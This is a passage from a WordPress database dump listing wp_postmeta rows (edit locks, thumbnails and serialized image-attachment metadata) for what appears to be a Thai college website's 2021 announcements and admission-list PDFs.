(28104, 11479, '_thumbnail_id', '11450'),
(28107, 11479, '_hide_featured', NULL),
(28110, 11481, '_edit_lock', '1617783896:14'),
(28111, 11481, '_edit_last', '14'),
(28112, 11481, '_thumbnail_id', '11449'),
(28115, 11481, '_hide_featured', NULL),
(28120, 11483, '_edit_lock', '1617784041:14'),
(28121, 11483, '_edit_last', '14'),
(28122, 11483, '_thumbnail_id', '11448'),
(28125, 11483, '_hide_featured', NULL),
(28130, 11485, '_edit_lock', '1617784110:14'),
(28131, 11485, '_edit_last', '14'),
(28132, 11485, '_thumbnail_id', '11447'),
(28135, 11485, '_hide_featured', NULL),
(28140, 11488, '_edit_lock', '1617784414:14'),
(28141, 11488, '_edit_last', '14'),
(28142, 11488, '_thumbnail_id', '11446'),
(28145, 11488, '_hide_featured', NULL),
(28152, 11490, '_edit_lock', '1617784598:14'),
(28153, 11490, '_edit_last', '14'),
(28154, 11490, '_thumbnail_id', '11445'),
(28157, 11490, '_hide_featured', NULL),
(28162, 11492, '_edit_lock', '1617784517:14'),
(28163, 11492, '_edit_last', '14'),
(28164, 11492, '_thumbnail_id', '11444'),
(28167, 11492, '_hide_featured', NULL),
(28170, 11494, '_edit_lock', '1617784565:14'),
(28171, 11494, '_edit_last', '14'),
(28172, 11494, '_thumbnail_id', '11443'),
(28175, 11494, '_hide_featured', NULL),
(28180, 11496, '_edit_lock', '1617784609:14'),
(28181, 11496, '_edit_last', '14'),
(28182, 11496, '_thumbnail_id', '11442'),
(28185, 11496, '_hide_featured', NULL),
(28190, 11498, '_edit_lock', '1617784650:14'),
(28191, 11498, '_edit_last', '14'),
(28192, 11498, '_thumbnail_id', '11441'),
(28195, 11498, '_hide_featured', NULL),
(28200, 11500, '_edit_lock', '1617784690:14'),
(28201, 11500, '_edit_last', '14'),
(28202, 11500, '_thumbnail_id', '11440'),
(28205, 11500, '_hide_featured', NULL),
(28208, 11502, '_edit_lock', '1617784942:14'),
(28209, 11502, '_edit_last', '14'),
(28210, 11502, '_thumbnail_id', '11438'),
(28213, 11502, '_hide_featured', NULL),
(28220, 11504, '_edit_lock', '1617784866:14'),
(28221, 11504, '_edit_last', '14'),
(28222, 11504, '_thumbnail_id', '11437'),
(28225, 11504, '_hide_featured', NULL),
(28228, 11506, '_edit_lock', '1617784931:14'),
(28229, 11506, '_edit_last', '14'),
(28230, 11506, '_thumbnail_id', '11436'),
(28233, 11506, '_hide_featured', NULL),
(28238, 11508, '_edit_lock', '1617785009:14'),
(28239, 11508, '_edit_last', '14'),
(28240, 11508, '_thumbnail_id', '11435'),
(28243, 11508, '_hide_featured', NULL),
(28246, 11510, '_edit_lock', '1617785047:14'),
(28247, 11510, '_edit_last', '14'),
(28248, 11510, '_thumbnail_id', '11434'),
(28251, 11510, '_hide_featured', NULL),
(28254, 11512, '_edit_lock', '1617785085:14'),
(28255, 11512, '_edit_last', '14'),
(28256, 11512, '_thumbnail_id', '11433'),
(28259, 11512, '_hide_featured', NULL),
(28262, 11514, '_edit_lock', '1617785134:14'),
(28263, 11514, '_edit_last', '14'),
(28264, 11514, '_thumbnail_id', '11432'),
(28267, 11514, '_hide_featured', NULL),
(28272, 11516, '_edit_lock', '1617785191:14'),
(28273, 11516, '_edit_last', '14'),
(28274, 11516, '_thumbnail_id', '11431'),
(28277, 11516, '_hide_featured', NULL),
(28282, 11518, '_edit_lock', '1617785240:14'),
(28283, 11518, '_edit_last', '14'),
(28284, 11518, '_thumbnail_id', '11430'),
(28287, 11518, '_hide_featured', NULL),
(28292, 11520, '_edit_lock', '1617785273:14'),
(28293, 11520, '_edit_last', '14'),
(28294, 11520, '_thumbnail_id', '11429'),
(28297, 11520, '_hide_featured', NULL),
(28300, 11522, '_edit_lock', '1617785311:14'),
(28301, 11522, '_edit_last', '14'),
(28302, 11522, '_thumbnail_id', '11428'),
(28305, 11522, '_hide_featured', NULL),
(28308, 11524, '_edit_lock', '1617785350:14'),
(28309, 11524, '_edit_last', '14'),
(28310, 11524, '_thumbnail_id', '11427'),
(28313, 11524, '_hide_featured', NULL),
(28316, 11526, '_edit_lock', '1617785406:14'),
(28317, 11526, '_edit_last', '14'),
(28318, 11526, '_thumbnail_id', '11426'),
(28321, 11526, '_hide_featured', NULL),
(28326, 11528, '_edit_lock', '1617785495:14'),
(28327, 11528, '_edit_last', '14'),
(28328, 11529, '_wp_attached_file', '2021/04/รายชื่อผู้ผ่านการคัดเลือก-ปวช-2564.pdf'),
(28331, 11528, '_hide_featured', NULL),
(28334, 11531, '_edit_lock', '1617785568:14'),
(28335, 11531, '_edit_last', '14'),
(28336, 11532, '_wp_attached_file', '2021/04/รายชื่อผู้ผ่านการคัดเลือก-ปวส-2564.pdf'),
(28339, 11531, '_hide_featured', NULL),
(28342, 11534, '_edit_lock', '1617785781:14'),
(28343, 11534, '_edit_last', '14'),
(28344, 11535, '_wp_attached_file', '2021/04/รายชื่อผู้ผ่านการคัดเลือก-ทลบ-2564.pdf'),
(28347, 11534, '_hide_featured', NULL),
(28350, 11537, '_wp_attached_file', '2019/12/169935600_1340832826292902_6418034019814253124_n.jpg'),
(28351, 11537, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:60:\"2019/12/169935600_1340832826292902_6418034019814253124_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"169935600_1340832826292902_6418034019814253124_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"169935600_1340832826292902_6418034019814253124_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"169935600_1340832826292902_6418034019814253124_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28352, 11538, '_wp_attached_file', '2019/12/170555326_1340832639626254_5997061024530912068_n.jpg'),
(28353, 11538, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:60:\"2019/12/170555326_1340832639626254_5997061024530912068_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"170555326_1340832639626254_5997061024530912068_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"170555326_1340832639626254_5997061024530912068_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"170555326_1340832639626254_5997061024530912068_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28354, 11539, '_wp_attached_file', '2019/12/169782844_1340832446292940_8757758614169992529_n.jpg'),
(28355, 11539, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:60:\"2019/12/169782844_1340832446292940_8757758614169992529_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"169782844_1340832446292940_8757758614169992529_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"169782844_1340832446292940_8757758614169992529_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"169782844_1340832446292940_8757758614169992529_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28358, 11547, '_wp_attached_file', '2021/04/080464-02.jpg'),
(28359, 11547, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:21:\"2021/04/080464-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"080464-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"080464-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"080464-02-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"080464-02-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"080464-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28360, 11548, '_wp_attached_file', '2021/04/080464-01.png'),
(28361, 11548, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:21:\"2021/04/080464-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"080464-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"080464-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"080464-01-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"080464-01-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"080464-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28367, 11550, '_wp_attached_file', '2019/12/08046401.jpg'),
(28368, 11550, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2019/12/08046401.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"08046401-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"08046401-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"08046401-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28369, 11551, '_wp_attached_file', '2019/12/08046401-1.jpg'),
(28370, 11551, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2019/12/08046401-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"08046401-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"08046401-1-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"08046401-1-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"08046401-1-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"08046401-1-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28371, 11554, '_wp_attached_file', '2019/12/08046403.jpg'),
(28372, 11554, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2019/12/08046403.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"08046403-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"08046403-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"08046403-768x205.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"08046403-1024x273.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"08046403-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28373, 11555, '_wp_attached_file', '2019/12/08046402.jpg'),
(28374, 11555, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2019/12/08046402.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"08046402-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"08046402-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"08046402-768x205.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"08046402-1024x273.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"08046402-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28376, 11565, '_edit_lock', '1618821521:14'),
(28377, 11565, '_edit_last', '14'),
(28378, 11566, '_wp_attached_file', '2021/04/ประกาศรับจนท.งานประกัน.pdf'),
(28381, 11565, '_hide_featured', NULL),
(28384, 11568, '_wp_attached_file', '2019/12/190464-02.jpg'),
(28385, 11568, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2019/12/190464-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190464-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190464-02-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190464-02-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190464-02-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190464-02-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28386, 11569, '_wp_attached_file', '2019/12/190464-01.jpg'),
(28387, 11569, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2019/12/190464-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"190464-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"190464-01-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"190464-01-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"190464-01-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"190464-01-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28391, 11572, '_wp_attached_file', '2021/04/messageImage_1618821071994.jpg'),
(28392, 11572, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:230;s:6:\"height\";i:230;s:4:\"file\";s:38:\"2021/04/messageImage_1618821071994.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"messageImage_1618821071994-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28412, 11582, '_edit_lock', '1619405957:14'),
(28413, 11583, '_wp_attached_file', '2021/04/ประกาศลงทะเบียน1-64.pdf'),
(28414, 11582, '_edit_last', '14'),
(28417, 11582, '_hide_featured', NULL),
(28422, 11587, '_wp_attached_file', '2021/04/21-04-19-21-16-49-197_deco.jpg'),
(28423, 11587, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1720;s:6:\"height\";i:2201;s:4:\"file\";s:38:\"2021/04/21-04-19-21-16-49-197_deco.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-16-49-197_deco-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-16-49-197_deco-234x300.jpg\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-16-49-197_deco-768x983.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:983;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"21-04-19-21-16-49-197_deco-800x1024.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-16-49-197_deco-234x300.jpg\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"CPH2121\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1618867009\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28424, 11588, '_wp_attached_file', '2021/04/21-04-19-21-17-15-195_deco.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(28425, 11588, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1634;s:6:\"height\";i:2142;s:4:\"file\";s:38:\"2021/04/21-04-19-21-17-15-195_deco.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-17-15-195_deco-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-17-15-195_deco-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"21-04-19-21-17-15-195_deco-768x1007.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1007;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"21-04-19-21-17-15-195_deco-781x1024.jpg\";s:5:\"width\";i:781;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"21-04-19-21-17-15-195_deco-229x300.jpg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"CPH2121\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1618867035\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(28430, 11590, '_wp_attached_file', '2019/12/1618911008538.jpg'),
(28431, 11590, '_wp_attachment_metadata', 